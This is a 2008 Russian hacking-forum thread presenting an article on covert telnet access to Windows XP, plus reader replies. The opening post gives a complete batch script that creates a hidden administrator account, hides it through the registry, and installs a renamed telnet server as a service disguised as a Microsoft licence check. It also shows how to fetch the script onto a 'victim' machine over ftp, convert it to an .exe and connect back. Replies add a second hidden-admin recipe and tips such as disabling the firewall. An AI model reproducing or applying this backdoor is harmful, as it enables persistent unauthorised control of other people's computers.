Статьи Скрытый telnet доступ к Windows

Discussion in 'Статьи' started by Ru}{eeZ, 4 Sep 2008.

  1. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    Скрытый telnet доступ к Windows

    ]INTRO[

    Данная статья предназначена для пользователей умеющих пользоваться консолью и знающих о telnet'е. Всё приведйнное ниже тестилось на машинах под управлением операционной системы Windows XP SP2.

    ]MENU[

    1,2. Для тех, кто имеет доступ к машине.
    2. Для впаривающих.
    3. Развязка


    ]START[

    1. Нам нужно паписать батник, в котором прописываются все параметры будущего телнета.

    Вот собсно и он, run.bat (в архиве):

    chcp 1251
    net user SUPPORT_388945a0 /delete
    net user SUPPORT_388945a0 pas /add
    net localgroup "Администраторы" SUPPORT_388945a0 /add
    net localgroup "Пользователи" SUPPORT_388945a0 /del
    copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe"
    ECHO Windows Registry Editor Version 5.00>>user.reg
    ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>user.reg
    ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
    regedit /s user.reg && DEL user.reg
    sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP
    sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение."
    tlntadmn config port=1451 sec=-NTLM
    net start "Проверка подлинности Microsoft Windows"


    Расшифровываю:
    chcp 1251 - переходим на 1251 кодировку, без этого не как, иначе нужно будет перекодировать в досовскую кодировку, например группа "Администраторы" будет такова "Ђ¤¬Ё*Ёбва*в®ал".
    net user SUPPORT_388945a0 /delete - удаляем стандартного скрытого юзверя.
    net user SUPPORT_388945a0 pas /add - добавляем его-же, только каплю подделаем его под себя. pas - вместо этого нужно ввести пароль.
    net localgroup "Администраторы" SUPPORT_388945a0 /add - добавляем юзверя SUPPORT_388945a0 в группу "Администраторы".
    net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах).
    copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" - Берёт стандартный файл сервера tlntsvr.exe, копирует его в ту же директорию, только уже под другим именем (tlntsevr.exe).
    ECHO Windows Registry Editor Version 5.00>>user.reg
    ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>user.reg
    ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
    regedit /s user.reg && DEL user.reg
    - изменение реестра, сначала воспроизводится написанное, за тем импортируется в реестр. SUPPORT_388945a0 - данный юзверь сдесь скрывается от посторонних глаз, т.е. не будет отображаться во время входа в систему, при просмотре пользователей через панель управления и т.д. (конец в ветке "UserList" без пробелов! почему-то исправляется...).
    sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP - создаём службу, %windir%\system32\tlntsevr.exe - путь до файла сервера телнета, "Проверка подлинности Microsoft Windows" - название службы.
    sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." - её описание.
    tlntadmn config port=1451 sec=-NTLM - порт 1451
    net start "Проверка подлинности Microsoft Windows" - старт службы


    2. Вот мы зашли на машину через некий telnet или его подобие, переходим в любую директорию. На своей машине запускаем ftp сервер, например Pablos ftp server (в архиве), переходим во вкладку User Accounts, там всё интуетивно понятно, указываем дынные для конекта.
    В консили переходим в нужную директорию, за тем пишем:
    ------------
    Способ 1.
    ------------

    ftp
    open 111.111.111.111
    SUPPORT_388945a0
    pas
    get run.bat
    bye
    "run.bat"


    ftp - угадайте что :)
    open 111.111.111.111 - открыть ип 111.111.111.111 (ваш ип).
    SUPPORT_388945a0 - логин пользователя.
    pas - пароль.
    get run.bat - отправить наш батник.
    bye - выйти из ftp
    "run.bat" - запустить батник (при нужде вводим путь).
    ------------
    Способ 2. Тут нам вообще не нужен ftp и вообще на много меньше мороки, но всеравно, попробуйте и первым способом.
    ------------
    Копируем код батника, маус 2 в консоли, волшебный пункт "Вставить" (у кого-то Past :)), жмём Enter и всё))
    Ну да, да...очень сложно... но первый способ всеравно попробуйте))


    3. Ну и самое интересное и долгожданное:
    Вводим в консоль:
    telnet 222.222.222.222 1451
    222.222.222.222 - ип жертвы
    1451 - порт
    Хотя зачем это разъяснять, если вы умееть пользоваться телнетом, но вдруг кто-то уже забыл).

    Что бы создать .exe юзаем программу "Bat To Exe Converter" (в архиве).

    Архив к статье: http://depositfiles.com/files/7783083 (537.94Kb).

    п.с. подобная статья на этой ветке от StG-44 с его взглядом на телнет http://forum.antichat.ru/thread68300.html
     
    #1 Ru}{eeZ, 4 Sep 2008
    Last edited: 7 Sep 2008
    5 people like this.
  2. neprovad

    neprovad Elder - Старейшина

    Joined:
    19 Oct 2007
    Messages:
    900
    Likes Received:
    275
    Reputations:
    59
    Орфография хромает. Правильно будет писать - подлинности. Вот я если увидел у себя такую надпись, то сразу же почуял бы неладное.
    В целом норм.
     
    1 person likes this.
  3. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    Исправил)
     
  4. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    >>>net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах).

    Вообще глупое действие
     
    1 person likes this.
  5. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Вы что, вообще охр**ели? Уже удалили 3 подобных статьи от Giviona (линк ниже)

    Называется, найдите 10 отличий - http://www.hackzona.ru/hz.php?name=News&file=article&sid=8820
     
    1 person likes this.
  6. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    Я эту статью вообще ни коем образом не видел
     
  7. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    Стандартный же юзверь под этим именем не в двух группах учавствует, вот мы и прикроем этого, что бы не вызывать подозрений
     
  8. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    мля писалось 100 раз
    но мне очень нравиться такие статьи подробные! Сам такие примерно пишу на досуге.
    Респект вообщем)
    Добавляю

    Скрытые пользователи храняться тут...... (там все юзеры и админы +еще и скрытые)
    C:\WINDOWS\system32\lusrmgr.exe

    может кому понадобиться для всяких пакостей)))
     
  9. paulzey

    paulzey Elder - Старейшина

    Joined:
    30 Oct 2007
    Messages:
    52
    Likes Received:
    16
    Reputations:
    5
    Во-первых, .msc (не .exe).
    Во-вторых, это просто оснастка консоли управления, в ней самой ни черта не хранится.
    В-третьих, для сеанса telnet такое не подойдёт.
     
  10. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    хм..... я сам не знал что это не exe потому что лень смотреть но так все программы обладают exe =-)
    Во вторых я имел ввиду что через нее можно все делать с юзерами (ПС вот че ты так придираешься?)
    В третих я разве чтото упоминал о телнете???

    пздц какой то народ какой пошол
     
  11. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    тот же вопрос :confused:
     
  12. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    Не палится как обычно запущенный телнет и т.д.
    вообще не занимает канал обычного телнета
     
    1 person likes this.
  13. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    |: netstat -an УУУУУХ ТЫ ПРюВЕТ ПОРТ ЧЕТЫРНАДЦАТЬПЕТДЕСЯТОДИН!!!11

    зы: я только один прочитал это? подключение по телнету НЕ занимает канал обычного телнета :eek: а чей канал тогда занимает ftp ? :D


    зыы: а може это телепатнет? :eek: :confused:

    HTML:
    telepatnet > open 192.168.0.1 1451
    [ но так шоб беспаливна! ]
     
    #13 IIAHbI4, 5 Sep 2008
    Last edited: 5 Sep 2008
    2 people like this.
  14. axelll

    axelll New Member

    Joined:
    15 Sep 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    есть проблемка - доступ к удаленному компу есть.
    поднял на нем телнет доступ.
    подрубаюсь спокойно к компу.
    тасклист могу смотреть.

    но не могу запустить ни одной проги.
    каждый раз пишет
    This program cannot be run in DOS mode.
    пробывал просто написать имя файла или через start - результат одинаков.

    хотя на удаленной машине стоит винда.
     
  15. RedAlert

    RedAlert Elder - Старейшина

    Joined:
    26 May 2008
    Messages:
    66
    Likes Received:
    10
    Reputations:
    0
    Создай какой нить батник ) ну типа echo "start proga.exe" >> 1.bat , ну а потом запусти батник , мож прокатит
    ЗЫ : Темы про батники уже достали...
     
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    А если создать акк свой

    net user pidor 123 /add
    net localgroup Administrators pidor /add

    и в реестр добавить в ветку

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

    pidor dword:00000000


    то будет беспалевно? Эту учетку админ не увидит?
     
  17. SpangeBoB

    SpangeBoB Elder - Старейшина

    Joined:
    12 Jul 2008
    Messages:
    1,680
    Likes Received:
    393
    Reputations:
    102
    Не вижу не одного препятствия посмотреть учетную запись.
     
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Почему? а где она видна будет?
     
  19. lamer28

    lamer28 Member

    Joined:
    16 Apr 2009
    Messages:
    64
    Likes Received:
    7
    Reputations:
    0
    Win+R "control userpasswords2"
     
  20. X-3

    X-3 Member

    Joined:
    28 Mar 2009
    Messages:
    306
    Likes Received:
    58
    Reputations:
    -2
    1) Не видно будет в Welcome-screen, через администрирование - ясен пень видно.
    2) Не забудьте поставить "срок действия пароля не ограничен" (это для тех, кто собирается постоянно лазить на комп жертвы).
    3) Также полезно отключить хотя бы базовый файерволл.